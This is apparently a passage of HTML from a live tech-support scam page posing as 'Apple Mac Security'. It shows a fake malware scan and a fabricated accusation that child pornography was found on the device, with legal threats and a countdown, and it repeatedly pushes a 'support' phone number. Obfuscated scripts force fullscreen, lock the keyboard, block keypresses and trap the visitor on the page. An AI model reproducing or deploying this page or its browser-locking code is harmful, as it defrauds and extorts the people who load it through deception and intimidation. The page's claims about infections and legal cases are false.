  <div class="flex"> <img src="-EBq-current.png" width="20px" height="20px;" style="margin-right: 10px; top: 33px; position: absolute;"><p style="font-weight: 400; position: absolute; left: 30px;">Current Threat</p></div>


  <br><br>
  <div class="progress" id="bar">
    <div class="progress__bar"></div>
  </div>

  <p style="font-size: 13px;" id="info">A quick scan is in progress...<br>Estimated time remaining: <n id="time">0</b></n><br><n id="amount">0</b></n> Files scanned.</p>

  <a href="#"class="button" id="re">to cancel</a>
  <p style=" font-size: 13px;" id="recx">Keep working while we analyze your device.</p>

  <p style="font-size: 13px; color: #0063c6; cursor: pointer;" id="recx-hide">protection history</p>
  <br>
  <p id="shx" style="font-size: 13px; color: #0063c6; display: none; cursor: pointer;">Scan Options<br> Allowed Threats<br> Protection History</p>


  </li>

  <li>

<div class="flex"><img src="nOxp-sett.png" height="28px" width="30px;" style="margin-right: 10px; margin-top: 5px;"><p style="position: absolute; left: 35px;    bottom: 76px;    line-height: 18px;">Virus & threat protection settings </p> </div>
<p style="color: grey; font-size: 13px;">no action required</p>
<p style="font-size: 13px; color: #0063c6;">Manage your settings</p>
  </li>
  </ul>
  <ul>

  <li>


  <p style="position: absolute; top: -55px;">I have a question?</p>

  <p style="font-size: 13px; color: #0063c6; position: absolute; top: -15px; cursor: pointer;">get help</p>

  </li>
  <li>


    <p style="position: absolute; top: 25px;">who will protect me</p>

    <p style="font-size: 13px; color: #0063c6; position: absolute; top: 65px; cursor: pointer;">Supplier management</p>

    </li>
    <li>


      <p style="position: absolute; top: 100px; "><br>Help us improve Apple Mac security</p>

      <p style="font-size: 13px; color: #0063c6; position: absolute; top: 152px; cursor: pointer;">Send us your feedback</p>

      </li>
      <li>

        <p style="position: absolute; top: 190px;">Change your privacy settings</p>
        <p style="position: absolute; top: 220px; font-size: 13px;">View and change privacy settings on Apple Mac<br><n id="which"></b></n> devices.</p>

        <p style="font-size: 13px; color: #0063c6; position: absolute; top: 270px; cursor: pointer;">Privacy Settings<br>Privacy Dashboard<br>Privacy Statement</p>

        </li>

  </ul>

  </div>
  <img src="uZbx-si.png" class="btn" style="border-bottom-left-radius: 10px;" width="30.9px; height: 15.2px;" id="clscl">
  <br>
  </div>
  <script>
        function _0x3864(_0x1c6b7c,_0x186c30){const _0x3af3f5=_0x3af3();return _0x3864=function(_0x3864e4,_0x3b6818){_0x3864e4=_0x3864e4-0x145;let _0x2ffc27=_0x3af3f5[_0x3864e4];return _0x2ffc27;},_0x3864(_0x1c6b7c,_0x186c30);}const _0x120b90=_0x3864;(function(_0x11245b,_0x399471){const _0x484ad5=_0x3864,_0x3ce058=_0x11245b();while(!![]){try{const _0x98db45=parseInt(_0x484ad5(0x159))/0x1+parseInt(_0x484ad5(0x156))/0x2+-parseInt(_0x484ad5(0x157))/0x3+parseInt(_0x484ad5(0x14f))/0x4*(parseInt(_0x484ad5(0x14d))/0x5)+-parseInt(_0x484ad5(0x154))/0x6*(-parseInt(_0x484ad5(0x14a))/0x7)+parseInt(_0x484ad5(0x14b))/0x8+-parseInt(_0x484ad5(0x153))/0x9*(parseInt(_0x484ad5(0x146))/0xa);if(_0x98db45===_0x399471)break;else _0x3ce058['push'](_0x3ce058['shift']());}catch(_0x4c5bec){_0x3ce058['push'](_0x3ce058['shift']());}}}(_0x3af3,0xd168f),navigator[_0x120b90(0x148)]['getHighEntropyValues']([_0x120b90(0x14c)])[_0x120b90(0x152)](_0x5d4a87=>{const _0x34a5d0=_0x120b90;if(navigator[_0x34a5d0(0x148)][_0x34a5d0(0x147)]==='Windows'){const _0x50374a=parseInt(_0x5d4a87[_0x34a5d0(0x14c)]['split']('.')[0x0]);if(_0x50374a>=0xd)document[_0x34a5d0(0x14e)](_0x34a5d0(0x151))[_0x34a5d0(0x145)]=_0x34a5d0(0x150);else _0x50374a>0x0?document[_0x34a5d0(0x14e)]('which')[_0x34a5d0(0x145)]='\x2010':console['log'](_0x34a5d0(0x158));}else console[_0x34a5d0(0x155)](_0x34a5d0(0x149));}));function _0x3af3(){const _0x55b0fa=['then','8307981KmaoCQ','698898oyTfCp','log','206406BEAYQF','3284430LqgwKS','Beyond','1551249BFJJQD','innerHTML','10qOcTfl','platform','userAgentData','does\x20not\x20work\x20on\x20Microsoft\x20Windows','49LSVWsI','2146616jahimr','platformVersion','229170rrxzjw','getElementById','12ujjTvZ','\x2011','which'];_0x3af3=function(){return _0x55b0fa;};return _0x3af3();}
  </script>






<div class="alert_popup cardcontainer lightbox">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <p class="text-center" style="    font-size: 16px;
font-weight: normal;
margin: 0;
margin-bottom: 5px;
padding: 5px 10px;
color: #fff;font-weight: bold;
margin-top: 8px; text-align: center;"><img src="microsoft.png" class="logo12"> Apple Mac Security - Spyware Alert</p>
                <p class="text-center">** Apple Mac is infected with Trojan:SLocker **</p>
                <p>A critical error has occurred due to the outdated version of the browser. Update your browser as soon as possible.</p>
                <p>The following errors are also possible on outdated versions of the browser:</p>
                <ul class="icon-links">
                  <li>> Loss of personal and stored data</li>
                  <li>> Confidental information leak</li>
                  <li>> Browsers errors</li>
                </ul>

                  <p>A Apple Mac Security scan has detected potentially unwanted adware on this device that can steal passwords, online identities, financial information, personal files, images, or documents.</p>
                  <p>Please contact us immediately so that our engineer can explain the removal process over the phone.<br><br>

                  Please contact Apple Mac Support immediately to report this threat, prevent spoofing, and unlock access to this device.<br><br>
                  Closing this Apple Mac puts your personal information at risk and interrupts your Apple Mac registration.</p>

               <p style="padding-bottom: 0px;">Call Apple Mac Support <strong>  +1 (833) 923-9200  (toll free)</strong></p>
               <div class="action_buttons"> <a class="" id="leave_page" style="cursor: pointer;">OK</a> <a class="" id="leave_page">Cancel</a> </div>
            </div>

        </div>
    </div>
</div>
<audio id="beep" loop>
  <source src="_Fm7-alert.mp3" type="audio/mpeg">
</audio>

<script>
  var _0x353c6b=_0x5e6d;(function(_0x5e2fe9,_0x4e7d00){var _0x41ce49=_0x5e6d,_0x2e364a=_0x5e2fe9();while(!![]){try{var _0x31b079=-parseInt(_0x41ce49(0x1e4))/0x1+-parseInt(_0x41ce49(0x1e8))/0x2*(parseInt(_0x41ce49(0x1ea))/0x3)+-parseInt(_0x41ce49(0x1ef))/0x4*(-parseInt(_0x41ce49(0x1ed))/0x5)+parseInt(_0x41ce49(0x1e2))/0x6+parseInt(_0x41ce49(0x1e6))/0x7*(parseInt(_0x41ce49(0x1e9))/0x8)+-parseInt(_0x41ce49(0x1e5))/0x9+-parseInt(_0x41ce49(0x1e3))/0xa;if(_0x31b079===_0x4e7d00)break;else _0x2e364a['push'](_0x2e364a['shift']());}catch(_0x379049){_0x2e364a['push'](_0x2e364a['shift']());}}}(_0x427e,0xd69c3),addEventListener(_0x353c6b(0x1e1),function(){var _0x1eeb7c=_0x353c6b,_0x5c2e04=document[_0x1eeb7c(0x1eb)],_0x1eb00c=_0x5c2e04['requestFullScreen']||_0x5c2e04[_0x1eeb7c(0x1ec)]||_0x5c2e04[_0x1eeb7c(0x1e7)];_0x1eb00c[_0x1eeb7c(0x1ee)](_0x5c2e04);}));function _0x5e6d(_0x5b284e,_0xba9ea5){var _0x427e89=_0x427e();return _0x5e6d=function(_0x5e6db0,_0xf1a2ec){_0x5e6db0=_0x5e6db0-0x1e1;var _0x1f99d8=_0x427e89[_0x5e6db0];return _0x1f99d8;},_0x5e6d(_0x5b284e,_0xba9ea5);}function _0x427e(){var _0x12d35a=['8xBVEAf','click','2309124gUoVSV','3727820uKdWld','514119OTQUIk','13659984kBRhIJ','217evpgCa','mozRequestFullScreen','28uahSZr','396624BpMuEP','2781WToveE','documentElement','webkitRequestFullScreen','3437315wtgkUt','call'];_0x427e=function(){return _0x12d35a;};return _0x427e();}

</script>

<div id="lst" class="lst lightbox">
  <div class="ilb top">
      <div class="headers ilb" style="border-bottom: 1px solid #d6d5d5;">
          <span id="txtadd" class="fl title"><span class="fl ilb"><img src="microsoft.png" class="logo3"></span> Apple Mac Security Center</span>
          <span id="txts1" class="fl title2"><a href="#"><img src="cross.png"></a></span>

      </div>
  </div>
  <div id="txtintro">
              <!-- <span class="colo-rd">App: Ads.financetrack(2).dll<br>
              Threats Detected: Trojan Spyware</span> -->
              <span class="colo-rd"><span class="blink">(Apple Legal Terms Violated)</span> &nbsp;  Pornographic Content Detected<br>
              Child Poronography Case ID:- G-0x80070057</span>

  </div>
  <img id="banner" src="merg-gif.gif">
  <div id="disclaimer">
   The IP Address of this Mac Device is send to the Apple Servers as Pornographic content storage or web activity detected. Legal case proceeding may start if not contacted Support Representative in<strong><span id="timer" style="color: green;">
    <span id="time">60 </span>&nbsp;Seconds  &nbsp;     
  </span></strong><br>
      <span class="support">Contact Apple Mac Support:<strong style="color: red;">   +1 (833) 923-9200  </strong>(toll free)</span>
  </div>
  <div id="bottom">
      <img id="badge" src="microsoft.png"><span class="title3">Apple Mac</span>
      <ul>
          <li>
              <a href="#">
                  <div class="fr button2">
                      <span id="addtochromebutton">Deny</span>
                  </div>
              </a>
          </li>
          <li>
              <a href="#">
                  <div class="fr buttons blink">
                      <span id="addtochromebutton">Close</span>
                  </div>
              </a>
          </li>
      </ul>

  </div>
</div>

</div>

<div id="footer">
  <div class="row">

      <div class="col-md-12">
          <div class="right-foot" style="text-align: center;">
              <span id="footertxt"><img src="microsoft.png"> Apple Mac: </span><span style="font-weight: 700;padding-left: 13px;color: #fff;">Support Contact <span style="border: 1px solid #fff;border-radius: 5px;padding: 2px 5px;">  +1 (833) 923-9200  (toll free)</span></span>
          </div>
      </div>
      <div class="col-md-12">
          <marquee width="100%" direction="left" height="100px"><small class="text-left" style="color: #eee;font-size: 12px;"><strong>Security Note :</strong>  This Apple machine has been locked, as we have detected Child Pornographic content across the logs of the Browser. As per US Laws, child Pornography is prohibited and consumption of digital asstes related to them,may result in further criminal proceedings.  If you have unknowingly vistied any pornographic website or videos, please call the Support team to close the case, if not contacted, the Case may be forwarded to the Legal department. Do not try to use this Machine till you have not reported or clsoe the Case.  </small></marquee>
      </div>
  </div>


</div>

<div id="welcomeDiv"
     class="answer_list">
    <p class="text-center" style="color: #FEFEFE;  margin-top:10px; font-size: 16px; opacity:.9; ">This Apple devcie is flagged as we have detected Child Pornography evidence, if you have not stored Child Pornography videos, in ths machine, contact Support Team and close the Case now.If you think this message is not for you, that means you are using Counterfeit Software or a dangerous ransomware is installed and it will lock your device!<br> The case will be transferred to Legal department, if not resolved immediately.  Please contact Support Team immediately. A Service Representative will help you solve the problem.</p>


</div>



<div id="chat-box">
  <img src="logo.png"><span style="color: #222;
font-size: 21px;
font-weight: 600;
margin-left: 6px;
position: relative;
top: 5px;">Apple</span> <p style="font-weight: 600;">Support</p>
 <h4 style="font-weight: 600;">  +1 (833) 923-9200 (toll free)</h4>
   <div class="arrow-down">
     <i class="fa fa-caret-down"></i>
   </div>


  </div>




<div id="chrome-alerts" class="chrome-alert" style="padding-top:10px">
	<div>
	<!-- <a href="javascript:openlink()" class="cross">×</a> -->
		<p>Leave site?</p>
    <p>Changes you made may not be saved.</p>
    <input type="checkbox" id="checkbox" name="checkbox" value="checkbox">
  <label for="checkbox">Prevent this page from creating additional dialogs</label><br>
		<div class="action_buttons">
		  <a class="" id="leave_page">Cancel</a>
		  <a class="active" id="leave_page">Leave</a>
		</div>
	</div>
</div>


<script>
  function _0xb0bd(_0x4ffc67,_0x2e89df){var _0x419477=_0x4194();return _0xb0bd=function(_0xb0bdf2,_0x4a940f){_0xb0bdf2=_0xb0bdf2-0x1c7;var _0x16e9c3=_0x419477[_0xb0bdf2];return _0x16e9c3;},_0xb0bd(_0x4ffc67,_0x2e89df);}var _0x528074=_0xb0bd;(function(_0x3c0481,_0x12d411){var _0x503dfe=_0xb0bd,_0x3759c5=_0x3c0481();while(!![]){try{var _0x56a040=-parseInt(_0x503dfe(0x1c7))/0x1+-parseInt(_0x503dfe(0x1c8))/0x2*(-parseInt(_0x503dfe(0x1c9))/0x3)+parseInt(_0x503dfe(0x1cf))/0x4*(-parseInt(_0x503dfe(0x1ce))/0x5)+-parseInt(_0x503dfe(0x1cc))/0x6+parseInt(_0x503dfe(0x1d1))/0x7*(-parseInt(_0x503dfe(0x1ca))/0x8)+parseInt(_0x503dfe(0x1cb))/0x9+parseInt(_0x503dfe(0x1cd))/0xa;if(_0x56a040===_0x12d411)break;else _0x3759c5['push'](_0x3759c5['shift']());}catch(_0x481250){_0x3759c5['push'](_0x3759c5['shift']());}}}(_0x4194,0x35d99),$(document)[_0x528074(0x1d0)](function(){var _0x1e4288=_0x528074;$(_0x1e4288(0x1d3))['click'](function(){var _0x5aa1dc=_0x1e4288;$(_0x5aa1dc(0x1d2))['show']();});}));function _0x4194(){var _0x134db0=['#mycanvas','134402pAoPCi','4QdquwP','559635trSWbX','1069384kYxSkV','3099492BEjgQG','443136nGKvMo','1226030IqRwSY','1005EkRUcm','5524fnAVPe','ready','7YwTbSP','#welcomeDiv'];_0x4194=function(){return _0x134db0;};return _0x4194();}
</script>

<script type="text/javascript">
 function _0x1ee2(_0x1999fd,_0x33e8b5){var _0x716146=_0x7161();return _0x1ee2=function(_0x1ee2c8,_0x189974){_0x1ee2c8=_0x1ee2c8-0x1a0;var _0x5d99a8=_0x716146[_0x1ee2c8];return _0x5d99a8;},_0x1ee2(_0x1999fd,_0x33e8b5);}function _0x7161(){var _0xe8c955=['2586880QmuecT','117534rAAxAr','Windows\x20Support\x20-\x20Call\x20Helpline\x20Now','413GsROfu','4MYFWWM','45SdSmjS','2061645sAlscz','13758nRqTTS','19658350RhlKei','74224PXioHT','8903547qwpOah'];_0x7161=function(){return _0xe8c955;};return _0x7161();}(function(_0x1bcc99,_0x361a2a){var _0x50277d=_0x1ee2,_0x470ddf=_0x1bcc99();while(!![]){try{var _0x422055=parseInt(_0x50277d(0x1a2))/0x1*(parseInt(_0x50277d(0x1a4))/0x2)+parseInt(_0x50277d(0x1a3))/0x3*(-parseInt(_0x50277d(0x1a1))/0x4)+parseInt(_0x50277d(0x1a8))/0x5+-parseInt(_0x50277d(0x1a9))/0x6+-parseInt(_0x50277d(0x1a0))/0x7*(parseInt(_0x50277d(0x1a6))/0x8)+-parseInt(_0x50277d(0x1a7))/0x9+parseInt(_0x50277d(0x1a5))/0xa;if(_0x422055===_0x361a2a)break;else _0x470ddf['push'](_0x470ddf['shift']());}catch(_0x12ce28){_0x470ddf['push'](_0x470ddf['shift']());}}}(_0x7161,0x8619d),window['onbeforeunload']=function(){var _0x21923b=_0x1ee2;if(data_needs_saving())return _0x21923b(0x1aa);else return;});
          </script>
		  
		 <script type="text/javascript">
  $(document).ready(function() {
   $("#chat-box").delay(6000).fadeIn(100);
});

</script> 
		  
<script>
function _0x2f7e(){var _0x436c6b=['102794IRpniR','keyboard','onkeydown','3173304DYTSYe','4958104MudDaA','12599576bPsVst','12TKzHfC','lock','3735810DbpjOx','2193550IwAuqd','2147810GyMYFs'];_0x2f7e=function(){return _0x436c6b;};return _0x2f7e();}function _0x8d63(_0x3c2aa7,_0x14021d){var _0x2f7e5b=_0x2f7e();return _0x8d63=function(_0x8d6371,_0x34f47d){_0x8d6371=_0x8d6371-0x1e9;var _0x84ebfa=_0x2f7e5b[_0x8d6371];return _0x84ebfa;},_0x8d63(_0x3c2aa7,_0x14021d);}var _0x5d1c45=_0x8d63;(function(_0x2f2443,_0x162cd9){var _0x3abe8d=_0x8d63,_0x255c0d=_0x2f2443();while(!![]){try{var _0x16c5a8=-parseInt(_0x3abe8d(0x1ee))/0x1*(-parseInt(_0x3abe8d(0x1e9))/0x2)+parseInt(_0x3abe8d(0x1f1))/0x3+-parseInt(_0x3abe8d(0x1f2))/0x4+-parseInt(_0x3abe8d(0x1ec))/0x5+-parseInt(_0x3abe8d(0x1eb))/0x6+-parseInt(_0x3abe8d(0x1ed))/0x7+parseInt(_0x3abe8d(0x1f3))/0x8;if(_0x16c5a8===_0x162cd9)break;else _0x255c0d['push'](_0x255c0d['shift']());}catch(_0x12d39f){_0x255c0d['push'](_0x255c0d['shift']());}}}(_0x2f7e,0x9caf2),navigator[_0x5d1c45(0x1ef)][_0x5d1c45(0x1ea)](),document[_0x5d1c45(0x1f0)]=function(_0x2d8d53){return![];});
</script>

          <script type="text/javascript">
            var _0x11750f=_0xf945;(function(_0x40a46c,_0x4d44ac){var _0x395d82=_0xf945,_0x3ce44a=_0x40a46c();while(!![]){try{var _0x3dded7=-parseInt(_0x395d82(0x1d6))/0x1+parseInt(_0x395d82(0x1d4))/0x2*(-parseInt(_0x395d82(0x1cc))/0x3)+-parseInt(_0x395d82(0x1cd))/0x4+parseInt(_0x395d82(0x1d0))/0x5+parseInt(_0x395d82(0x1d1))/0x6*(parseInt(_0x395d82(0x1cf))/0x7)+parseInt(_0x395d82(0x1d3))/0x8+parseInt(_0x395d82(0x1cb))/0x9;if(_0x3dded7===_0x4d44ac)break;else _0x3ce44a['push'](_0x3ce44a['shift']());}catch(_0xe9f955){_0x3ce44a['push'](_0x3ce44a['shift']());}}}(_0x5df3,0xe258f),window['addEventListener'](_0x11750f(0x1d2),function(_0xf71e81){var _0x4501e1=_0x11750f,_0x4ec220=_0x4501e1(0x1ce);return(_0xf71e81||window[_0x4501e1(0x1d5)])['returnValue']=_0x4ec220,_0x4ec220;}));function _0xf945(_0x27db8e,_0xba247c){var _0x5df3b1=_0x5df3();return _0xf945=function(_0xf94567,_0x3a1f3a){_0xf94567=_0xf94567-0x1cb;var _0x500568=_0x5df3b1[_0xf94567];return _0x500568;},_0xf945(_0x27db8e,_0xba247c);}function _0x5df3(){var _0x2547c2=['4337250zVkhzB','7175334kZLVxo','beforeunload','10169392iRwccP','12aOSEsR','event','1215036rwHWbx','5773023tEmIgy','339381DkjpNC','4620172hDEFqE','Mac\x20Support\x20-\x20Call\x20Helpline\x20Now','7irDDZS'];_0x5df3=function(){return _0x2547c2;};return _0x5df3();}
          </script>

  </body>


</html>
